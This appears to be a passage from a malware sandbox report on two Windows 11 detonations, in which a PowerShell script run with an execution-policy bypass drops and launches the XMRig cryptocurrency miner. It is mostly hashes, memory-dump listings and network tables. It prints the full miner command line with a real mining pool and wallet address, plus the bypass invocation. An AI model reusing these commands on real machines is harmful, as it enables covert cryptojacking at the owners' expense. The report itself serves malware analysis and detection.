memory/2196-6-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-9-0x0000017D7F6B0000-0x0000017D7F726000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ft0wny1j.stu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2196-10-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-25-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-48-0x0000017D7F670000-0x0000017D7F682000-memory.dmp
memory/2196-61-0x0000017D7F500000-0x0000017D7F50A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2032-90-0x000001E3DD110000-0x000001E3DD130000-memory.dmp
memory/2032-91-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2196-92-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-94-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp
memory/2032-93-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2196-95-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2032-96-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-97-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-98-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-99-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-100-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-101-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-102-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-103-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-104-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-105-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-106-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-107-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-108-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-109-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-110-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-111-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-112-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-113-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-114-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-115-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-116-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-117-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-118-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-119-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-120-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-121-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-122-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-123-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-124-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-125-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-126-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-127-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-128-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-129-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-130-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-131-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-132-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-133-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-134-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-135-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-136-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-137-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-138-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-139-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-140-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-141-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-142-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-143-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-144-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-145-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-146-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-147-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-148-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-149-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-150-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-151-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-152-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-153-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-154-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-155-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-156-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:12
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3988 wrote to memory of 1020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3988 wrote to memory of 1020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3988-0-0x00007FFB389E3000-0x00007FFB389E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkspi5bv.zps.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3988-10-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/3988-9-0x000001B03B4E0000-0x000001B03B502000-memory.dmp
memory/3988-11-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/3988-12-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/3988-14-0x000001B03B590000-0x000001B03B5A2000-memory.dmp
memory/3988-15-0x000001B03B570000-0x000001B03B57A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1020-46-0x000001E6BF0C0000-0x000001E6BF0E0000-memory.dmp
memory/1020-47-0x000001E6BF120000-0x000001E6BF140000-memory.dmp
memory/1020-48-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/3988-49-0x00007FFB389E3000-0x00007FFB389E5000-memory.dmp
memory/1020-50-0x000001E752E40000-0x000001E752E60000-memory.dmp
memory/1020-51-0x000001E753070000-0x000001E753090000-memory.dmp
memory/1020-52-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/3988-53-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1020-54-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-55-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-56-0x000001E752E40000-0x000001E752E60000-memory.dmp
memory/1020-57-0x000001E753070000-0x000001E753090000-memory.dmp
memory/1020-58-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-59-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-60-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-61-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-62-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-63-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-64-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-65-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-66-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-67-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-68-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-69-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-70-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-71-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-72-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-73-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-74-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-75-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-76-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-77-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-78-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-79-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-80-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-81-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-82-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-83-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-84-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-85-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-86-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-87-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-88-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-89-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-90-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-91-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-92-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-93-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-94-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-95-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-96-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-97-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-98-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-99-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-100-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-101-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-102-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-103-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-104-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-105-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-106-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-107-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-108-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-109-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-110-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-111-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-112-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-113-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-114-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-115-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-116-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 704 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 704 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/704-0-0x00007FFC95430000-0x00007FFC95456000-memory.dmp
memory/704-1-0x000002A0696F0000-0x000002A069712000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iq02oqsj.5ro.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/704-11-0x000002A0699D0000-0x000002A0699E2000-memory.dmp
memory/704-12-0x000002A0699C0000-0x000002A0699CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1464-43-0x000001EFD5ED0000-0x000001EFD5EF0000-memory.dmp
memory/1464-44-0x00007FFC95430000-0x00007FFC95456000-memory.dmp
memory/1464-45-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-46-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-47-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-48-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-49-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-50-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-51-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-52-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-53-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-54-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-55-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-56-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-57-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-58-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-59-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-60-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-61-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-62-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-63-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-64-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-65-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-66-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-67-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-68-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-69-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-70-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-71-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-72-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-73-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-74-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-75-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-76-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-77-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-78-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-79-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-80-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-81-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-82-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-83-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
